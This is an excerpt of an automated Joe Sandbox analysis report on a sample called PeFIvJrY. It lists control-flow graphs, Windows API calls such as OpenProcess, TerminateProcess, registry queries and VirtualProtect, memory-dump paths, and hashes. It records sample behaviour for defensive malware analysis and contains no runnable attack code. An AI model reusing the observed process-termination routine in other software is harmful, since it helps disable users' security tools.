                                control_flow_graph 672 3feba0-3fec17 673 3fec1d-3fec20 672->673 674 3ff0b0-3ff0bf 672->674 676 3fec34 673->676 677 3fec22-3fec32 673->677 675 3ff092-3ff0af call 425711 674->675 678 3fec3e-3fec46 676->678 677->676 677->678 680 3fec4c-3fec5c 678->680 681 3ff0c1 678->681 684 3fec5e-3fec65 call 400980 680->684 685 3fec79-3fecaf call 3e21d0 680->685 683 3ff0c8-3ff0db 681->683 692 3fec67-3fec6e 684->692 693 3fec73 684->693 690 3fecb5-3fecbb 685->690 691 3fecb1-3fecb3 685->691 694 3fecbf-3fecef GetFileVersionInfoSizeExW 690->694 691->690 691->694 692->683 693->685 695 3fecf5-3fed2b call 3fe9d0 GetFileVersionInfoExW 694->695 696 3ff0e0-3ff0fb GetLastError 694->696 699 3ff107-3ff122 GetLastError 695->699 700 3fed31-3fed55 call 3fe8b0 call 3e22e0 695->700 702 3ff12e call 4291af 699->702 709 3fed89-3feda1 700->709 710 3fed57-3fed69 700->710 706 3ff133-3ff146 call 3fa380 call 3f51a0 702->706 706->675 709->706 711 3feda7-3fede4 VerQueryValueW 709->711 713 3fed7f-3fed86 call 4259a5 710->713 714 3fed6b-3fed79 710->714 716 3ff1ad-3ff1c6 GetLastError call 3f51a0 711->716 717 3fedea-3fedf1 711->717 713->709 714->702 714->713 716->675 717->716 720 3fedf7-3fee02 717->720 723 3fee08-3fee0a 720->723 725 3ff009-3ff01d 723->725 726 3fee10-3fee19 723->726 727 3ff01f-3ff022 725->727 728 3ff062-3ff067 725->728 729 3fee1b-3fee1e 726->729 730 3fee24-3fee85 call 3fcf60 call 4000b0 726->730 731 3ff024-3ff02a 727->731 732 3ff071-3ff073 727->732 728->732 733 3ff069-3ff06d 728->733 729->730 734 3ff14b-3ff16a call 3feba0 729->734 753 3feeda-3feee2 730->753 754 3fee87-3feed5 GetLastError call 3ffaa0 call 3f51a0 call 3e22e0 730->754 731->732 736 3ff02c-3ff03e 731->736 732->675 733->732 745 3feffb-3ff004 734->745 746 3ff170-3ff185 call 3f51a0 734->746 739 3ff054-3ff060 call 4259a5 736->739 740 3ff040-3ff04e 736->740 739->675 740->739 743 3ff1a8 call 4291af 740->743 743->716 745->723 746->675 756 3ff18a-3ff196 753->756 757 3feee8-3fef0f 753->757 754->723 760 3ff19e call 4291af 756->760 759 3fef15-3fef1e 757->759 759->759 762 3fef20-3fef68 call 3e21d0 call 3ffaa0 759->762 766 3ff1a3 call 4291af 760->766 773 3fefab-3fefb0 762->773 774 3fef6a-3fef6d 762->774 766->743 776 3fefba-3fefc4 773->776 777 3fefb2-3fefb6 773->777 775 3fef6f-3fef75 774->775 774->776 775->776 778 3fef77-3fef89 775->778 776->745 779 3fefc6-3fefdb 776->779 777->776 780 3fef9f-3fefa9 call 4259a5 778->780 781 3fef8b-3fef99 778->781 782 3fefdd-3fefeb 779->782 783 3feff1-3feff8 call 4259a5 779->783 780->776 781->760 781->780 782->766 782->783 783->745
                                Strings
                                • \StringFileInfo\%04x%04x\%ls, xrefs: 003FEE3F
                                • \VarFileInfo\Translation, xrefs: 003FEDD0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: \StringFileInfo\%04x%04x\%ls$\VarFileInfo\Translation
                                • API String ID: 0-3503296632
                                • Opcode ID: d6767061f4ae53069688626920be129685e99f0f60a18d6025c33425efacbd7d
                                • Instruction ID: 82d9677fc57a8b149719693decf11bffc7d35cea30364caaf0801e20eca7f89c
                                • Opcode Fuzzy Hash: d6767061f4ae53069688626920be129685e99f0f60a18d6025c33425efacbd7d
                                • Instruction Fuzzy Hash: 4CA13CB090125CDFEB25CF55CC44BAEBBB5FF44304F2081AAE909A7251EB749A48CF65
                                Function 003F14A0 Relevance: 12.3, APIs: 8, Instructions: 345registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 788 3f14a0-3f1503 GetDC 789 3f1505-3f153f GetDeviceCaps * 2 ReleaseDC 788->789 790 3f1541 788->790 791 3f1546-3f1598 KiUserCallbackDispatcher 789->791 790->791 792 3f159e-3f15c2 791->792 793 3f1710-3f1723 791->793 796 3f15de-3f15e5 792->796 797 3f15c4-3f15d9 792->797 794 3f1729-3f173d call 425d49 793->794 795 3f1806-3f1820 793->795 794->795 816 3f1743-3f1803 call 3f0f20 call 42598b call 425cff 794->816 798 3f1827-3f182f 795->798 799 3f1822-3f1825 795->799 801 3f161e-3f1623 796->801 802 3f15e7-3f160b call 3ee7b0 796->802 797->796 805 3f185a-3f1862 798->805 806 3f1831-3f1839 798->806 804 3f1855 799->804 807 3f163c-3f166b 801->807 808 3f1625-3f162a 801->808 802->801 819 3f160d-3f161b call 3ee7b0 802->819 804->805 817 3f1895-3f18c8 RegOpenKeyExW 805->817 818 3f1864-3f1891 805->818 811 3f184c-3f1850 806->811 812 3f183b-3f1848 806->812 814 3f166d-3f1694 807->814 815 3f16a7-3f16b4 807->815 808->793 813 3f1630-3f163a 808->813 811->805 821 3f1852 811->821 812->806 820 3f184a 812->820 813->814 814->815 822 3f1696-3f16a4 call 3ee7b0 814->822 824 3f16bc-3f16c1 815->824 825 3f16b6-3f16ba 815->825 816->795 826 3f193a 817->826 827 3f18ca-3f18f7 RegQueryValueExW 817->827 818->817 819->801 820->805 821->804 822->815 828 3f16dc-3f16e3 824->828 829 3f16c3 824->829 834 3f16c7-3f16d7 825->834 831 3f193f-3f1946 826->831 835 3f18f9-3f18fd 827->835 836 3f1931-3f1934 RegCloseKey 827->836 838 3f170c 828->838 839 3f16e5-3f1709 call 3ee7b0 828->839 829->834 841 3f196c-3f19a2 call 425711 831->841 842 3f1948-3f1969 call 3ee7b0 831->842 834->828 835->836 837 3f18ff-3f1905 835->837 836->826 837->826 845 3f1907-3f191f 837->845 838->793 839->838 842->841 851 3f1926-3f192f 845->851 852 3f1921-3f1924 845->852 851->831 852->831
                                APIs
                                • GetDC.USER32(00000000), ref: 003F14F8
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003F150E
                                • GetDeviceCaps.GDI32(?,0000005A), ref: 003F1517
                                • ReleaseDC.USER32(00000000,?), ref: 003F151E
                                • KiUserCallbackDispatcher.NTDLL(00000030,00000000,?,00000000), ref: 003F1590
                                • RegOpenKeyExW.KERNEL32(80000001,0046117C,00000000,00020019,?), ref: 003F18C0
                                • RegQueryValueExW.KERNEL32(?,004611DC,00000000,?,?,00000004), ref: 003F18EF
                                • RegCloseKey.KERNEL32(?), ref: 003F1934
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CapsDevice$CallbackCloseDispatcherOpenQueryReleaseUserValue
                                • String ID:
                                • API String ID: 3089890080-0
                                • Opcode ID: cf0f1ffc98257563f0574614c9dac9ac2ae39fc054a205cd9d96e9705e4fa5b7
                                • Instruction ID: 9eb8cddb622da181a9d565fdb7695f28ef1b3aa697f471e761f0fca471965602
                                • Opcode Fuzzy Hash: cf0f1ffc98257563f0574614c9dac9ac2ae39fc054a205cd9d96e9705e4fa5b7
                                • Instruction Fuzzy Hash: 4CE1D271D10B4CDADB13DF74D8417AEB7B9BF2A781F14832AF90576162FB7068828A44
                                Function 003FAB50 Relevance: 10.8, APIs: 7, Instructions: 292synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 857 3fab50-3fabe5 call 4279a0 OpenProcess 860 3faf0c-3faf12 857->860 861 3fabeb-3fac10 K32EnumProcessModules 857->861 862 3faf14-3faf26 860->862 863 3faf42-3faf61 call 425711 860->863 864 3fac16-3fac36 K32GetModuleBaseNameW 861->864 865 3faf00-3faf06 FindCloseChangeNotification 861->865 866 3faf38-3faf3f call 4259a5 862->866 867 3faf28-3faf36 862->867 864->865 869 3fac3c-3fac64 864->869 865->860 866->863 867->866 870 3faf67-3faf6f call 4291af 867->870 873 3fac67-3fac70 869->873 873->873 875 3fac72-3facac call 3e21d0 873->875 880 3facae-3facb9 875->880 881 3facbb-3facc4 875->881 882 3facc6-3facce 880->882 881->882 883 3fad07-3fad1d 882->883 884 3facd0-3facd8 882->884 886 3fad20-3fad29 883->886 885 3face0-3facf9 call 42e03b 884->885 891 3facfb-3fad01 885->891 886->886 888 3fad2b-3fad57 call 3e2430 886->888 893 3fad5d-3fad63 888->893 894 3faec4-3faecd 888->894 891->883 893->894 897 3fad69 893->897 895 3faecf-3faede 894->895 896 3faefa 894->896 899 3faef0-3faef7 call 4259a5 895->899 900 3faee0-3faeee 895->900 896->865 897->894 898 3fad6f-3fad7f TerminateProcess 897->898 901 3fae65-3fae7a WaitForSingleObject 898->901 902 3fad85-3fad8c 898->902 899->896 900->899 903 3faf62 call 4291af 900->903 906 3fae8c-3fae8e 901->906 907 3fae7c-3fae89 call 3ee7b0 901->907 908 3faebe 902->908 909 3fad92-3fad9d GetLastError 902->909 903->870 906->908 913 3fae90-3fae97 906->913 907->906 908->894 912 3fada0-3fadbe 909->912 912->912 915 3fadc0-3fade1 912->915 916 3fae99-3faeb1 call 3ee7b0 913->916 917 3faeb4 913->917 918 3fadfa-3fae2e call 3ee7b0 915->918 919 3fade3-3fadf4 call 3e21d0 915->919 916->917 917->908 918->908 926 3fae34-3fae43 918->926 919->918 927 3fae59-3fae63 call 4259a5 926->927 928 3fae45-3fae53 926->928 927->908 928->903 928->927
                                APIs
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,A05DD77D), ref: 003FABD7
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,A05DD77D), ref: 003FAC08
                                • K32GetModuleBaseNameW.KERNEL32(?,?,?,00000104,?,A05DD77D), ref: 003FAC2E
                                • TerminateProcess.KERNEL32(?,00000000,?,A05DD77D), ref: 003FAD77
                                • GetLastError.KERNEL32(?,A05DD77D), ref: 003FAD92
                                • WaitForSingleObject.KERNEL32(?,0000EA60,?,A05DD77D), ref: 003FAE6B
                                • FindCloseChangeNotification.KERNEL32(?,?,A05DD77D), ref: 003FAF06
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Process$BaseChangeCloseEnumErrorFindLastModuleModulesNameNotificationObjectOpenSingleTerminateWait
                                • String ID:
                                • API String ID: 382258105-0
                                • Opcode ID: 4a8be9b21c4476a2e809628068972764bb3c2bd590dc1ddf37faf36968c3ee71
                                • Instruction ID: 7538a9f7956f09b8b7b6a0ff86358e446f85c9c892a013fe943ad94af204ec4e
                                • Opcode Fuzzy Hash: 4a8be9b21c4476a2e809628068972764bb3c2bd590dc1ddf37faf36968c3ee71
                                • Instruction Fuzzy Hash: D8B1E771D006288BDB25DF28DC897AEB7B5FF55300F1402A9E90DA7291E731AE84CF95
                                Function 0040AD20 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 978 40ad20-40ad85 979 40af5b-40af6a 978->979 980 40ad8b-40adb2 GetLastError 978->980 983 40af3b-40af58 call 425711 979->983 981 40adb8-40adc4 980->981 982 40af6c-40af6e call 40a000 980->982 984 40adc7-40adcb 981->984 990 40af73 982->990 987 40ade6-40ae0b call 424cbf 984->987 988 40adcd 984->988 995 40af78-40af86 call 424cdb 987->995 996 40ae11-40ae62 call 3f9e40 call 400000 987->996 991 40add0-40add4 988->991 990->995 991->987 993 40add6-40addc 991->993 993->991 998 40adde-40ade3 SwitchToThread 993->998 995->984 1004 40ae64-40ae81 call 40a940 996->1004 1005 40ae86-40aed0 call 40a7c0 call 3f9e70 call 424cbf 996->1005 998->987 1004->1005 1014 40aed2-40aedb 1005->1014 1015 40aedd-40aee4 call 40a9c0 1005->1015 1016 40aee9-40aef0 1014->1016 1015->1016 1018 40aef2-40aefa call 424cdb 1016->1018 1019 40aefd-40af19 SetLastError 1016->1019 1018->1019 1019->983
                                APIs
                                • GetLastError.KERNEL32(A05DD77D,?,?,?,?,?,?,?,?,?,?,?,0043D095,000000FF), ref: 0040AD9A
                                • SwitchToThread.KERNEL32(?,?), ref: 0040ADDE
                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040AF10
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$SwitchThread
                                • String ID: <{!truncated!}>
                                • API String ID: 2971943850-4093793577
                                • Opcode ID: be1c26a6cc8bbb8c25eec4224fec6504b150c5136eb613e11177cd356ed708c0
                                • Instruction ID: 57bcff391d55d6cfd6613a97e49da99b40583f86f8c57f0a265c0364e934f299
                                • Opcode Fuzzy Hash: be1c26a6cc8bbb8c25eec4224fec6504b150c5136eb613e11177cd356ed708c0
                                • Instruction Fuzzy Hash: BF7159B0A00648DFCB05DFA9D881AEEFBF1FF48304F14816AE815AB391D735A951CB65
                                Function 0632A1A8 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1022 632a1a8-632a1b4 1023 632a1b6-632a221 1022->1023 1024 632a228-632a247 GetCurrentProcess 1022->1024 1023->1024 1025 632a250-632a284 GetCurrentThread 1024->1025 1026 632a249-632a24f 1024->1026 1028 632a286-632a28c 1025->1028 1029 632a28d-632a2c1 GetCurrentProcess 1025->1029 1026->1025 1028->1029 1031 632a2c3-632a2c9 1029->1031 1032 632a2ca-632a2e5 call 632a388 1029->1032 1031->1032 1036 632a2eb-632a31a GetCurrentThreadId 1032->1036 1038 632a323-632a385 1036->1038 1039 632a31c-632a322 1036->1039 1039->1038
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0632A236
                                • GetCurrentThread.KERNEL32 ref: 0632A273
                                • GetCurrentProcess.KERNEL32 ref: 0632A2B0
                                • GetCurrentThreadId.KERNEL32 ref: 0632A309
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: d68f8d1a3f38508345c93307713989d7f47f2b5bc7c9bec9ce7385f365e0abf9
                                • Instruction ID: e20ab0868f07abbd4480159902b5923e3784a0cbaaa1f42b0b3d6a2269ddd900
                                • Opcode Fuzzy Hash: d68f8d1a3f38508345c93307713989d7f47f2b5bc7c9bec9ce7385f365e0abf9
                                • Instruction Fuzzy Hash: FB5134B4D1070A8FDB54CFAAD948BDEBBF1EF88310F20845AE019A7360D7759944CB65
                                Function 0632A1B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1046 632a1b8-632a247 GetCurrentProcess 1051 632a250-632a284 GetCurrentThread 1046->1051 1052 632a249-632a24f 1046->1052 1053 632a286-632a28c 1051->1053 1054 632a28d-632a2c1 GetCurrentProcess 1051->1054 1052->1051 1053->1054 1056 632a2c3-632a2c9 1054->1056 1057 632a2ca-632a2e5 call 632a388 1054->1057 1056->1057 1060 632a2eb-632a31a GetCurrentThreadId 1057->1060 1061 632a323-632a385 1060->1061 1062 632a31c-632a322 1060->1062 1062->1061
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0632A236
                                • GetCurrentThread.KERNEL32 ref: 0632A273
                                • GetCurrentProcess.KERNEL32 ref: 0632A2B0
                                • GetCurrentThreadId.KERNEL32 ref: 0632A309
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 32d125d189d1421af52317729b194fcf9bb800ab0dfc5870e22c04c59ee9b223
                                • Instruction ID: 7804789083a82e6841e500290171ad0b1061b757f5080af8e4d4589d563be7c0
                                • Opcode Fuzzy Hash: 32d125d189d1421af52317729b194fcf9bb800ab0dfc5870e22c04c59ee9b223
                                • Instruction Fuzzy Hash: C75145B0D107098FDB54CFAAD948BDEBBF1EF88310F20845AE019A7360DB755944CB65
                                Function 003EF180 Relevance: 6.1, APIs: 4, Instructions: 97synchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1069 3ef180-3ef1af CreateMutexW GetLastError 1070 3ef1df-3ef1e0 1069->1070 1071 3ef1b1-3ef1c3 1069->1071 1072 3ef1d5-3ef1dc call 4259a5 1071->1072 1073 3ef1c5-3ef1d3 1071->1073 1072->1070 1073->1072 1074 3ef1e3-3ef229 call 4291af 1073->1074 1079 3ef23d-3ef244 1074->1079 1080 3ef22b-3ef233 1074->1080 1081 3ef258-3ef27d 1079->1081 1082 3ef246-3ef24e 1079->1082 1080->1079 1083 3ef27f-3ef288 GlobalDeleteAtom 1081->1083 1084 3ef28c-3ef291 1081->1084 1082->1081 1083->1084 1087 3ef29a-3ef29e 1084->1087 1088 3ef293-3ef294 FreeLibrary 1084->1088 1089 3ef2ab-3ef2bc 1087->1089 1090 3ef2a0-3ef2a8 call 4259a5 1087->1090 1088->1087 1090->1089
                                APIs
                                • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 003EF193
                                • GetLastError.KERNEL32 ref: 003EF19E
                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 003EF280
                                • FreeLibrary.KERNEL32(?,A05DD77D,?,00000000,0043B3A0,000000FF), ref: 003EF294
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AtomCreateDeleteErrorFreeGlobalLastLibraryMutex
                                • String ID:
                                • API String ID: 717197772-0
                                • Opcode ID: a662ffbe07fbf2a36b980932a9c029abec4f9f6c52fb964ee08d0e9732b6e075
                                • Instruction ID: 6d1270504a4803e3a9c21d03aeca1e13297ca10974a98818d49c63c3f4deb390
                                • Opcode Fuzzy Hash: a662ffbe07fbf2a36b980932a9c029abec4f9f6c52fb964ee08d0e9732b6e075
                                • Instruction Fuzzy Hash: 2F31E274200258DFEB11DF65EC04B5A7BE8FB08714F004639EA05C72A0EBB9DA50CFA9
                                Function 004041D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135memoryCOMMON
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017,A05DD77D), ref: 00404213
                                • VirtualProtect.KERNEL32 ref: 0040433A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FeaturePresentProcessorProtectVirtual
                                • String ID: \\?\C:\Windows
                                • API String ID: 2760357182-641808500
                                • Opcode ID: e935bbaee986ac052a5520b8611440180f31466fe1e2d30fb21e1c737fa4cadb
                                • Instruction ID: 2a0ef8de441900a834d5c7e857ae70488f3231e1f9b483f3c8d6ce7d22943a1f
                                • Opcode Fuzzy Hash: e935bbaee986ac052a5520b8611440180f31466fe1e2d30fb21e1c737fa4cadb
                                • Instruction Fuzzy Hash: 5151F1B1905210DBD710DF24E94972A7BA4FB4430CF46827FD9056B3A1FBB959088BAF
                                Function 0042571F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                Download Yara Rule
                                APIs
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E20CE
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: @ >$@ >
                                • API String ID: 3109751735-3421840758
                                • Opcode ID: cc039822be1256842e87f05f3d3b9e3ecdb72919299116b1c3cc4061fd6ebb45
                                • Instruction ID: c92646c22b474af1649a8c1ac2c9edee6bb447a1008b1dacf286c79f5a0c7cca
                                • Opcode Fuzzy Hash: cc039822be1256842e87f05f3d3b9e3ecdb72919299116b1c3cc4061fd6ebb45
                                • Instruction Fuzzy Hash: 0A01C831A0021CB7CB14AAA6FC46989776C9E00354BA04637FA14EB582FB78EA5586DD
                                Function 0042DE20 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0004DCC4,00000000,00000000,00000000), ref: 0042DE69
                                • GetLastError.KERNEL32(?,003EA221,00000000,00000000), ref: 0042DE75
                                • __dosmaperr.LIBCMT ref: 0042DE7C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread__dosmaperr
                                • String ID:
                                • API String ID: 2744730728-0
                                • Opcode ID: fdca472e9d85883ef0f3ee81d57c698baa58f593e086b5814675c7f797b6a49f
                                • Instruction ID: e8990f9fdf7317ac846f9c775568fd6451f76f5af8126b7cc85916c02f9cc8cb
